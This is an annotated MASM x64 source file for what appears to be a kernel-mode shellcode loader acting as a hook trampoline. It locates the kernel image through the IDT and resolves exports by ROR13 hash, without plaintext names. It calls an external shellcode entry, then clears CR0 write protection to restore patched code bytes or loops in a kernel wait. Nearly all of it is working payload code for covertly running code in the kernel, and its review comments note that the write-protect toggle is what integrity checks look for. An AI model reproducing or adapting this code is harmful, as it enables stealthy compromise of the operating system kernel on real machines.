; =====================================================================
; Syntax : MASM, Intel operand order, x64 (PROC/ENDP, dq, .CODE)
; ABI    : Microsoft x64 is assumed for the external call (rcx/rdx args,
;          40h bytes reserved before each call, which covers the 32-byte
;          shadow space)
; Mode   : kernel mode — the code executes SIDT, reads and writes CR0,
;          reads CR3 and executes WBINVD, all of which are privileged.
;
; Overview of what is on this page (grounded in the code below):
;   main              hook trampoline: saves registers, locates the kernel
;                     image via the IDT, calls driver_shellcode_entry,
;                     then either restores 8 bytes at a patched address
;                     (with CR0.WP cleared), parks in a sleep loop, or
;                     returns 0C0000001h.
;   PEGetModuleFromAddress_ScanBack  walks page by page downwards until an
;                     MZ/PE header is found.
;   HashROR13A_asm    ROR13 string hash.
;   PEGetProcAddressH_asm  resolves an export by its ROR13 hash.
;   GetCR3 / CacheFlush / __chkstk  one-instruction helpers.
;
; NOTE(review): none of the PROCs carry FRAME/unwind information, so a
; fault inside any of them cannot be unwound; they also live in .CODE
; together with writable-looking data (the dq cells), which the
; one_second store below depends on.
; =====================================================================
extern driver_shellcode_entry:PROC
.CODE
main PROC
        jmp     main_start
; Data cells kept inside the code section. data_orig_fnptr and
; data_orig_fnptrcode are only read here; presumably they are filled in
; by driver_shellcode_entry (or by whoever deploys this blob) — TODO confirm.
data_orig_fnptr     dq 0000000000000000h    ; address of the patched entry to restore / continue at
data_orig_fnptrcode dq 0000000000000000h    ; the 8 original bytes written back to [data_orig_fnptr]
kernelbase          dq 0000000000000000h    ; optional pre-supplied kernel base; 0 = locate via IDT
one_second          dq 0FFFFFFFFFF676980h   ; -10,000,000 (100 ns units) = 1 s relative wait, as the label says
main_start:
; Save every register the trampoline touches or that the continuation
; might rely on. rsi is pushed twice on purpose: the second copy is the
; frame base (rsi = rsp) used to undo the AND/SUB below. rax and the
; flags are not preserved; r14, r15, rbp and xmm6–xmm15 are not saved
; but are also never written here.
        PUSH    rcx
        PUSH    rdx
        PUSH    r8
        PUSH    r9
        PUSH    rbx
        PUSH    rsi
        PUSH    rdi
        PUSH    r10
        PUSH    r11
        PUSH    r12
        PUSH    r13
        PUSH    rsi
        MOV     rsi, rsp                    ; rsi = frame base, restored before the POPs
        AND     rsp, 0FFFFFFFFFFFFFFF0h     ; 16-byte align
        SUB     rsp, 020h                   ; scratch for the 10-byte IDTR image
        SIDT    [rsp]                       ; [rsp] = limit(2), [rsp+2] = IDT base(8)
        mov     r11, rcx                    ; careful: r11 = original rcx (presumably the WorkItem passed by the hooked caller) — confirm against driver_shellcode_entry
        MOV     rcx, [rsp+2]                ; rcx = IDT base
; Load 8 bytes at gate 0 + 4: this picks up the handler's offset bits
; 16..63 in the upper 48 bits of rcx, while the low 16 bits hold the
; gate's ist/type bytes. The scanner below drops the low 12 bits, so the
; junk only shifts the start address by at most 0F000h — which is
; presumably why this works; verify on a target where the handler sits
; near the end of its image.
        MOV     rcx, [rcx+4]
        CALL    PEGetModuleFromAddress_ScanBack
        MOV     r12, rax                    ; r12 = image base found by scanning
        sub     rsp,40h                     ; shadow space (+ alignment kept: rsp was 16-aligned)
        mov     rdx,r11                     ; arg2 = saved original rcx
        mov     rcx,[kernelbase]            ; arg1 = pre-supplied base if non-zero ...
        test    rcx,rcx
        jnz     doentry
        mov     rcx,r12                     ; ... else the scanned base
doentry:
        mov     r12,rcx                     ; r12 = the base actually used (also used by the sleep loop)
        call    driver_shellcode_entry
        add     rsp,40h
; Dispatch on the two data cells:
;   fnptrcode != 0            -> write it back to [fnptr], jump to fnptr
;   fnptrcode == 0, fnptr != 0 -> park in the sleep loop
;   both == 0                 -> return 0C0000001h (STATUS_UNSUCCESSFUL)
        MOV     rax, [data_orig_fnptrcode]  ; rax = original 8 bytes
        MOV     rcx, [data_orig_fnptr]      ; rcx = address they belong at
        test    rax,rax
        jz      loop_for_ever2
; CR0.WP (bit 16) is cleared so the store can hit a read-only (code)
; page, then set again. The imm32 0fffeffffh is sign-extended, so the
; upper CR0 bits survive.
; NOTE(review): nothing here prevents preemption or CPU migration
; between the two CR0 writes, so WP can be left cleared on this CPU or
; the store can fault on another; this WP-toggle-around-a-store pattern
; is also exactly what kernel integrity checks look for.
        mov     r8,cr0
        and     r8,0fffeffffh
        mov     cr0,r8
        MOV     [rcx], rax                  ; restore the 8 bytes at the patched entry
        mov     r8,cr0
        or      r8, 010000h
        mov     cr0,r8
        MOV     rsp, rsi                    ; undo alignment/scratch
        POP     rsi
        POP     r13
        POP     r12
        POP     r11
        POP     r10
        POP     rdi
        POP     rsi
        POP     rbx
        POP     r9
        POP     r8
        POP     rdx
        POP     rcx
        MOV     rax, [data_orig_fnptr]
        JMP     rax                         ; tail-jump to the restored entry (rax is clobbered by design)
loop_for_ever2:
        test    rcx,rcx
        jnz     loop_for_ever               ; rcx!=0, rax=0: loop for ever; rcx=rax=0: ret
        MOV     rsp, rsi
        POP     rsi
        POP     r13
        POP     r12
        POP     r11
        POP     r10
        POP     rdi
        POP     rsi
        POP     rbx
        POP     r9
        POP     r8
        POP     rdx
        POP     rcx
        mov     RAX,0C0000001h              ; STATUS_UNSUCCESSFUL
        RET
loop_for_ever:
; Resolve one export of the base in r12 by ROR13 hash and call it
; forever with (0, 0, &one_second). The plaintext name behind the hash
; is not on this page; the argument shape and the 1-second relative
; interval suggest a kernel delay/wait routine — TODO confirm.
        mov     edx,58586d92h               ; edx = ROR13 hash of the export
        mov     rcx,r12
        call    PEGetProcAddressH_asm
        mov     r13,rax                     ; r13 = resolved function (callee-saved, survives the calls)
loop_1:
        sub     rsp,40h                     ; shadow space; rsp stays 16-aligned here
        mov     rcx,0
        mov     rdx,0
        lea     r8,[one_second]
; NOTE(review): this store rewrites one_second with the very constant it
; is initialised to, so it is redundant; worse, one_second lives in
; .CODE, so if this section is mapped read-only the store faults every
; iteration.
        mov     rax,0FFFFFFFFFF676980h
        mov     [r8],rax
        call    r13
        add     rsp,40h
        jmp     loop_1
main ENDP
; ----------------------------------------------------
; Search for PE header given an address.
; May cause page faults.
; rcx -> scan address
; rax <- header address
; Starts one page BELOW the page containing rcx and walks downwards in
; 1000h steps until it finds 'MZ' followed by an e_lfanew <= 1000h whose
; target reads 'PE\0\0'. There is no lower bound: if no header exists
; below the address the loop runs until an unmapped page faults.
; Clobbers: rcx, rax, flags.
; ----------------------------------------------------
PEGetModuleFromAddress_ScanBack PROC
        SHR     rcx, 12                     ; page-align (drops the low 12 bits)
        SHL     rcx, 12
address_loop:
        MOV     eax, 1000h
        SUB     rcx, rax                    ; rcx -= one page
        MOV     ax, [rcx]                   ; dos header magic (partial write; only ax is compared)
        CMP     ax, 5a4dh                   ; 'MZ'
        JNE     address_loop
        MOV     eax, [rcx+60]               ; nt header address offset (e_lfanew)
        CMP     eax, 1000h
        JNBE    address_loop                ; reject e_lfanew beyond the first page
        ADD     rax, rcx                    ; nt header address
        MOV     eax, [rax]
        CMP     eax, 00004550h              ; nt header magic 'PE\0\0'
        JNE     address_loop
        MOV     rax, rcx                    ; rax = image base
        RET
PEGetModuleFromAddress_ScanBack ENDP
; ----------------------------------------------------
; Perform ROR13 hashing
; rcx -> string ptr (NUL-terminated)
; rax <- result (32-bit; edi accumulates, returned in eax)
; Clobbers: rax, flags, DF (cleared). rsi/rdi are saved and restored.
; ----------------------------------------------------
HashROR13A_asm PROC
        PUSH    rsi
        PUSH    rdi
        MOV     rsi, rcx
        XOR     rdi, rdi                    ; hash = 0
        XOR     rax, rax                    ; so that eax == al after LODSB
        CLD
hash_loop:
        LODSB                               ; al = *rsi++
        TEST    al, al
        JZ      hash_loop_finish
        ROR     edi, 13
        ADD     edi, eax                    ; hash = ror(hash,13) + c
        JMP     hash_loop
hash_loop_finish:
        MOV     eax, edi
        POP     rdi
        POP     rsi
        RET
HashROR13A_asm ENDP
; rcx -> module base address
; rdx -> hash of exported function
; rax <- address of exported function
; Clobbers: rax, rdx, r8, flags (rcx is preserved around the hash call).
; NOTE(review): NumberOfNames is loaded into r8d but never compared
; against rsi, so a hash that matches no export walks past the end of
; AddressOfNames instead of failing. Forwarder RVAs are not recognised
; either; the returned value is whatever AddressOfFunctions holds.
; Offsets 60 / 136 / 24 / 28 / 32 / 36 are the IMAGE_DOS_HEADER.e_lfanew,
; IMAGE_NT_HEADERS64 export DataDirectory and IMAGE_EXPORT_DIRECTORY
; fields named in the inline comments.
PEGetProcAddressH_asm PROC
; rdi = PIMAGE_EXPORT_DIRECTORY
; rsi = counter NumberOfNames
        PUSH    rdi
        PUSH    rsi
        MOV     edi, [rcx+60]               ; nt header address offset
        MOV     edi, [rdi+rcx+136]
        ADD     rdi, rcx                    ; ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress + hModule
        MOV     r8d, [rdi+24]               ; PIMAGE_EXPORT_DIRECTORY->NumberOfNames (loaded, never used as a bound)
        XOR     rsi, rsi                    ; index = 0
find_loop:
        MOV     eax, [rdi+32]               ; PIMAGE_EXPORT_DIRECTORY->AddressOfNames
        ADD     rax, rcx                    ; PIMAGE_EXPORT_DIRECTORY->AddressOfNames + hModule
        MOV     eax, [rax+rsi*4]            ; AddressOfNames[index]
        ADD     rax, rcx
        PUSH    rcx                         ; keep hModule across the hash call
        MOV     rcx, rax
        CALL    HashROR13A_asm
        POP     rcx
        CMP     eax, edx
        JE      find_loop_found
        INC     rsi
        JMP     find_loop
find_loop_found:
; found!
        MOV     edx, [rdi+36]               ; PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals
        ADD     rdx, rcx                    ; PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals + hModule
        XOR     rax, rax
        MOV     ax, [rdx+rsi*2]             ; AddressOfNameOrdinals[index]
        MOV     edx, [rdi+28]               ; PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions
        ADD     rdx, rcx                    ; PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions + hModule
        MOV     eax, [rdx+rax*4]            ; AddressOfFunctions[index]
        ADD     rax, rcx                    ; AddressOfFunctions[index] + hModule
        POP     rsi
        POP     rdi
        RET
PEGetProcAddressH_asm ENDP
; ----------------------------------------------------
; Return the current CR3 (page-table base). Privileged.
; rax <- CR3
; ----------------------------------------------------
GetCR3 PROC
        MOV     rax, cr3
        RET
GetCR3 ENDP
; ----------------------------------------------------
; Flush the CPU cache.
; WBINVD writes back and invalidates every cache line on this CPU; it is
; privileged, serialising and very expensive.
; ----------------------------------------------------
CacheFlush PROC
        WBINVD
        RET
CacheFlush ENDP
; ----------------------------------------------------
; Stub for the compiler's stack probe: returns without probing.
; NOTE(review): this disables stack probing for the linked C code, so a
; frame larger than one page can skip the guard page unnoticed.
; ----------------------------------------------------
__chkstk PROC public
        RET
__chkstk ENDP
END